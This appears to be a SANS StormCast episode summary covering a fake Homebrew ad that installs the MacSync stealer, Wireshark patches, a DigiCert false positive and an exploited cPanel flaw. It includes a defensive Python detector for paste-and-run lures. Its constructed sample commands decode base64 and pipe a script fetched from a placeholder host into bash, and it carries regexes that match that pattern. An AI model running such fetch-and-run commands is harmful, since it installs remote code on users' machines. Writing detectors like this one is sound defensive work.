SANS Stormcast Monday, May 4th, 2026: Malicious Homebrew Ads; Wireshark Update; Digicert False Positive; cPanel Exploited

SANS Internet StormCast, May 4, 2026

Why It Matters

Attackers are abusing trusted platforms, here Google's ad network and Google-hosted pages, to deliver malware, so a reputable domain in the address bar is no longer a useful safety cue for users or administrators. Keeping exposed tools such as Wireshark and cPanel patched closes holes that are already being exploited, and the DigiCert incident shows that automated trust decisions can fail in ways defenders need to understand before they are relied on against supply-chain attacks.

Key Takeaways

  • Malicious Homebrew ad abuses Google's ad platform and Google-hosted pages to deliver Mac malware.
  • Wireshark 4.6.5 patches 43 vulnerabilities found through AI-driven code analysis and adds a SharkFest ad and donation button to the start page.
  • A certificate compromise at DigiCert led Microsoft Defender for Endpoint to flag DigiCert certificates as malicious, a false positive.
  • A widely exploited cPanel/WHM vulnerability (CVE-2026-41940) has fixes available; enable automatic updates.
  • Pasting the base64-encoded command from the fake Homebrew page into Terminal installs the MacSync stealer.

Pulse Analysis

The episode opened with a Homebrew lure that rides on Google's ad platform and Google-hosted pages. The ad displays a business.google.com URL and lands the visitor on a counterfeit Homebrew page hosted on sites.google.com; instead of the project's real one-line installer, the page tells the visitor to paste a base64-encoded command into Terminal. That command decodes and runs a script that fetches further payloads and ultimately installs the MacSync stealer. Because the first hops use Google-owned domains, URL reputation and ad blocking alone do not stop it. The practical defenses are a policy against pasting unreviewed commands into a terminal, and endpoint telemetry that alerts when a shell decodes base64 into an interpreter or pipes a freshly downloaded script straight into sh or bash, the pattern that this and similar "paste this command" lures depend on.
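As an added example (not code from the ISC diary or the episode), the following Python scans shell command lines, for instance from zsh history or process-creation telemetry, for the pattern the lure depends on: a base64 blob decoded and handed to a shell, or a downloaded script piped straight into one. It decodes any blob it finds so the analyst sees the stage-2 fetch. The sample commands, the example.invalid domain and the allowlist of script sources are constructed for illustration; the first sample is the genuine Homebrew installer line, which fetches its script from raw.githubusercontent.com/Homebrew/install, included to show why a plain curl-into-bash rule needs an allowlist.

```python
"""Flag 'paste this into Terminal' command lines of the kind the fake Homebrew page uses.

Added example for this page, not code from the ISC diary or the episode. The inputs
below are constructed; example.invalid is a reserved placeholder name.
"""
import base64
import re

# Constructed stage-2 fetch, base64-encoded the way a lure page would present it.
FAKE_STAGE2 = "curl -fsSL https://update.example.invalid/stage2.sh | bash"
FAKE_B64 = base64.b64encode(FAKE_STAGE2.encode()).decode()

# Constructed sample command lines, e.g. from ~/.zsh_history or EDR process telemetry.
SAMPLE_COMMANDS = [
    # Genuine Homebrew installer (a remote script run by bash, but from the project's own repo)
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    # Lure-style: base64 blob decoded and piped into bash
    f"echo {FAKE_B64} | base64 -d | bash",
    # Lure-style variant: eval of the decoded output, using the macOS-style -D decode flag
    f'eval "$(echo {FAKE_B64} | base64 -D)"',
    # Benign noise
    "ls -la ~/Downloads",
    "brew update && brew upgrade",
]

# Assumed allowlist of script sources an organisation accepts for curl-into-bash installs.
ALLOWLISTED_SCRIPT_SOURCES = {"raw.githubusercontent.com/Homebrew/install"}

SHELL = r"(?:sudo\s+)?(?:ba|z|da)?sh\b"
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\b.*?\|\s*" + SHELL)
EVAL_DECODE = re.compile(r'eval\s+"?\$\(.*base64\s+(?:-d|-D|--decode)')
REMOTE_TO_SHELL = re.compile(r"(?:curl|wget)\b[^|]*\|\s*" + SHELL)
CMDSUB_REMOTE = re.compile(r'(?:ba|z|da)?sh\s+-c\s+"\$\((?:curl|wget)\b')
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
URL = re.compile(r"""https?://[^\s"'|)]+""")


def decode_base64_blobs(cmd):
    """Return printable text recovered from base64 blobs embedded in cmd (non-text is skipped)."""
    found = []
    for m in B64_BLOB.finditer(cmd):
        blob = m.group(0)
        if len(blob) % 4:  # not a complete base64 encoding (e.g. a long URL path segment)
            continue
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            found.append(text)
    return found


def analyze_command(cmd, depth=0):
    """Classify one command line; returns a finding dict, or None when nothing matched."""
    reasons, severity = [], None
    urls = URL.findall(cmd)

    if DECODE_TO_SHELL.search(cmd) or EVAL_DECODE.search(cmd):
        severity = "high"
        reasons.append("base64-decoded data is executed by a shell")
    elif REMOTE_TO_SHELL.search(cmd) or CMDSUB_REMOTE.search(cmd):
        reasons.append("remote script piped into a shell")
        trusted = any(u.split("://", 1)[1].startswith(src)
                      for u in urls for src in ALLOWLISTED_SCRIPT_SOURCES)
        severity = "info" if trusted else "medium"

    # Look one level inside decoded blobs so the stage-2 URL surfaces in the finding.
    decoded = decode_base64_blobs(cmd) if depth == 0 else []
    for text in decoded:
        inner = analyze_command(text, depth=1)
        if inner:
            severity = "high"
            reasons.append("decoded payload: " + inner["reasons"][0])
            urls.extend(inner["urls"])

    if severity is None:
        return None
    return {"command": cmd, "severity": severity, "reasons": reasons,
            "decoded": decoded, "urls": urls}


def scan(commands):
    """Return findings for every suspicious command line, in input order."""
    return [f for f in map(analyze_command, commands) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"[{f['severity']}] {f['command'][:60]}")
        for r in f["reasons"]:
            print("   -", r)
        for u in f["urls"]:
            print("   url:", u)
```

The "info" rating for the allowlisted source is deliberate: the genuine Homebrew installer is itself a remote script run by bash, so a rule that fires on every curl-into-bash gets tuned out within a week. The base64 indirection is the stronger signal, and the decoded stage-2 URL is what belongs in the blocklist and the hunt query.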

Wireshark 4.6.5 fixes 43 vulnerabilities found through AI-driven code analysis, and the episode notes that several could lead to remote code execution. Because Wireshark flaws are typically triggered by crafted packets or capture files, anyone who sniffs hostile networks or opens pcaps from untrusted sources is the population at risk, and network analysts and incident responders should update promptly. The release also refreshes the start page with a prominent SharkFest conference banner and a donation button, a reminder that the tool is community funded; users who depend on it for packet inspection are encouraged to support it.

Microsoft Defender for Endpoint flagged DigiCert certificate-authority certificates as malicious after a supply-chain breach at DigiCert compromised 60 certificates. The compromised certificates had been revoked, and the detection was a false positive; the incident shows how an automated trust decision can pull a CA out of service before anyone has confirmed the signal. The episode also warned of a widely exploited cPanel/WHM vulnerability (CVE-2026-41940) for which cPanel has released fixes on cpanel.net. Administrators should confirm that automatic updates are enabled (UPDATES=daily in /etc/cpupdate.conf), apply the current release, and treat any internet-exposed instance that was unpatched while exploitation was under way as potentially compromised, since a single cPanel server typically hosts many customer sites. Prompt patching and layered defenses remain the best mitigation.

Episode Description

Malicious Ad for Homebrew Leads to MacSync Stealer

https://isc.sans.edu/diary/Malicious%20Ad%20for%20Homebrew%20Leads%20to%20MacSync%20Stealer/32942

https://www.wireshark.org/docs/relnotes/wireshark-4.6.5.html

https://www.reddit.com/r/cybersecurity/comments/1t2hfsh/mde_flagging_digi_cert_certificate_as_malicious/

https://bugzilla.mozilla.org/show_bug.cgi?id=2033170

https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026
